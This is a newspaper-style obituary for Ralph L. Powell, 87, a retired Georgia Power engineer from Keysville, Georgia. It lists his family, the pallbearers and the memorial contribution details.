Keysville, GA - Ralph L. Powell, 87, husband of Pauline Cooper Powell, entered into rest March 30, 2018, at his residence surrounded by his family who loved him dearly. Mr. Powell, son of the late William Henry and Lillian Lewis Powell, was born in Houghton, Michigan, but, was a true Burke Countian. His family went back at least four generations. From the sandy soil of the big woods of Girard to the red clay of North Burke County he loved this piece of Georgia and nothing gave him more pleasure than a Sunday afternoon drive to the river. In his later years became an avid student of the Bible and he loved sharing the good news of Jesus Christ with others. He retired from Georgia Power where he was an Engineer and the Chief of Document Review. He was preceded in death by his children, Ralph L. Powell, Jr., and Julie Powell; his brother, William Henry Powell; and by his nephew, Henry Powell. In addition to his wife he is survived by his children, Lillian Powell Benson, of Newton, MA, Bryan Branch Powell, of North Augusta, SC, and Molly Powell Johnson, of Atlanta; his grandchildren, William Edward Benson, Lauren Virginia Benson, Juliette Mabry Johnson, Katherine Powell Johnson, David Yates Johnson, and Benjamin Henry Johnson. Pallbearers will be Porter Cohen, Bill Hargrove, Roy Jenkins, Alex Gray (honorary), Ted Perkins, Ray Trenter, and Fred Hargrove. In lieu of flowers memorial contributions may be made to First Baptist Church of Waynesboro, 853 N. Liberty Street, Waynesboro, GA 30830; or to BBN 107.1, PO Box 7300, Charlotte, NC 28241.
